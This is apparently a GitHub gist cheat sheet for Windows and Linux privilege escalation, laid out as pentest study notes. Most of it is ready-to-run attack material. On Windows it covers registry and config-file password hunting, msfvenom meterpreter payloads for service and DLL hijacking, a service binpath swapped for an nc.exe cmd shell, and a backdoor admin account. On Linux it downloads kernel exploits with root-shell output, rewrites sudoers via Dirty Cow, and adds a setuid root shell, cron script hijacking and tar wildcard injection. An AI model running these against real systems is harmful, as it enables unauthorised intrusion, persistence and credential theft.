Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Privilege Esclation Cheatsheet via @TheEagerPadawan

Privilege Esclation Cheatsheet

Windows

Scripts

  • JAWS
  • Sherlock
  • Powerup

Kernel Exploits

  • systeminfo -> look up missing kb's
  • systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"
  • sherlock -> Find-AllVulns powershell

Common Kernel Exploits

  • MS16-014 - applies to: Windows 7 SP1 x86
  • MS16-016 - 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601)
  • MS16-032 - applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2

Config files

  • creds in cleartext or base64 -> once windows in installed
  • c:\sysprep.inf
  • c:\sysprep\sysprep.xml
  • %WINDIR%\Panther\Unattend\Unattended.xml
  • %WINDIR%\Panther\Unattended.xml

GPP (Group Policy Preferences)

Only applicable for devices connected to a domain

  • Groups.xml stored in SYSVOL -> DC
    • encrypted with AES, but key got leaked
    • \\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups

Other Files

  • Services\Services.xml
  • ScheduldedTasks\ScheduledTasks.xml
  • Printers\Printers.xml
  • Drives\Drives.xml
  • DataSources\DataSources.xml

Other Misc Passwords

  • dir /s *pass* == *cred* == *vnc* == *.config*
  • findstr /si password *.xml *.ini *.txt
  • reg query HKLM /f password /t REG_SZ /s
  • reg query HKCU /f password /t REG_SZ /s
  • web.config
  • php.ini
  • httpd.conf
  • access.log
  • powerup:
    • Get-WebConfig (ISS > web.config)

putty:

  • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Tight VNC:

  • reg query HKCU\Software\TightVNC\Server
  • bncpwd.exe <encrypted_password>

Always Install Elevated:

  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
  • reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
    • both values = 1, created a malicious .msi file with msfvenom for example
    • execute it with msiexec /quiet /qn /i <filename.msi>

powerup:

  • Get-RegistryAlwaysInstallElevated
  • Write-UserAddMSI

Unquoted Services Paths (trusted service paths)

For each space in a file path, windows will attempt to look for and execute programs with a name that matches the word in front of the space.

Example:

  • C:\Program Files\Some Folder\Service.exe
  • C:\Program.exe
  • C:\Program Files\Some.exe
  • C:\Program Files\Some Folder\Service.exe
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

PFNet

  • C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
  • icalcs "C:\Program Files (x86)\Privacyware"
  • msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

Start and stop the service:

  • sc stop PFNet
  • sc start PFNET

Powerup:

  • Get-ServiceUnquoted
  • Write-ServiceBinary -Name <service_name> -Path <hijack_path>

Insecure Service Permissions

  • whoami > net user <name> - enumerate groups

  • accesschk.exe -> part of sysinternals

  • accesschk.exe -ucqv <service name>

  • accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Write access to a service as authenticated user?

W-XP ssdprsv and upnphost by default:

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost

Powerup:

  • Get-ModifiableService
  • Test-ServiceDaclPermission
  • Invoke-ServiceAbuse -Name <service_name> -Command <command>

Weak folder permissions

DLL Hijacking

Requires user interaction / reboot.

DLL search order on 32-bit systems:

  1. The directory from which the application is loaded
  2. 32-bit System directory (C:\Windows\System32)
  3. 16-bit System directory (C:\Windows\System)
  4. Windows directory (C:\Windows)
  5. The current working directory
  6. Directories in the PATH environment variable

You can use procmon to look for vulnerable dll's using the following filters:

  • Result is NAME NOT FOUND Include
  • Path ends with .dll
echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT

Generate a malicious payload with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll

Windows 7 x86/64:

  • IKE and AuthIP IPsec Keying Modules (IKEEEXT) - wlbsctrl.dll

Powerup:

  • Find-PathDLLHijkack
  • Find-ProjcessDLLHijkack
  • Wire-HijkackDll

Schedulded tasks:

On server 2000, 2003, and XP, scheduled tasks are running as system. Are they calling any .exe's and can you overwrite?

  • accesschk.exe -dqv <folder path>

Can you create a task yourself?

  • net start "Task Scheduler" at <hour:minute> /interactive "path to evil exe"

Powerup:

  • Get-ModifiableScheduledTaskFile

Useful commands

  • hostname
  • echo %username%
  • whoami / priv
  • swinsta - other logged in users
  • net users
  • net user <username>
  • net localgroup
  • net localgroup Administrators
  • net user rottenadmin P@ssword123! /add
  • net localgroup Administrators rottenadmin /add
  • ipconfing /all
  • route print
  • arp -a
  • netstat -ano
  • C:\WINDOWS\System32\drivers\etc\hosts
  • schtasks /query /fo LIST /v - scheduled task
  • tasklist /SVC - running processes
  • net start - started services
  • cd\ & dir /b /s proof.txt

Linux

  • not added -> ld_preload - URL

Scripts

  • Linux-Enum-Mod
  • linux-exploit-suggestor

Kernel Exploits

  • uname -a -> searchsploit
  • linux-exploit-suggestor

Common Kernel Exploits

  • CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)
  • CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
  • CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
  • CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Services Running as root

  • ps -aux | grep root
  • any shell escape sequences?

SUID Executables

  • runs with permissions of the owner
  • find / -perm -u=s -type f 2>/dev/null
  • any shell escape sequences - do we have write access?

Sudo rights / users

  • sudo -l
  • what can we execute -> any shell escape sequences

Cron jobs

  • find / -perm -2 -type f 2>/dev/null
  • ls -la /etc/cron.d
# rootme.c
int main(void)
{
  setgid(0);
  setuid(0);
  execl("/bin/sh", "sh", 0);
}
gcc rootme.c -o rootme

echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh

Wildcards

  • often combined with user interaction / cronjobs
  • cfr. Back to the Future: Unix Wildcards Gone Wild paper
  • wild cards can be utilized to inject arbitrary command by creating files that are seen as commands

Example:

--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.sh

Path Abuse ('.' in path)

Requires user interaction (eg somebody need to have . in their path)

  • $PATH:.:${PATH}
  • export $PATH
  • echo $PATH
  • replace executable files with a malicious one

Useful commands

  • ps aux | grep root
  • crontab -l
  • ifconfig -a
  • cat /etc/resolv.conf
  • netstat -tulpn
  • arp -e
  • route
  • id
  • who
  • cat /etc/passwd | cut -d: -f1 - list of users
  • cat ~/.ssh
  • find . -name package.json -print -exec cat {} +

Sources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment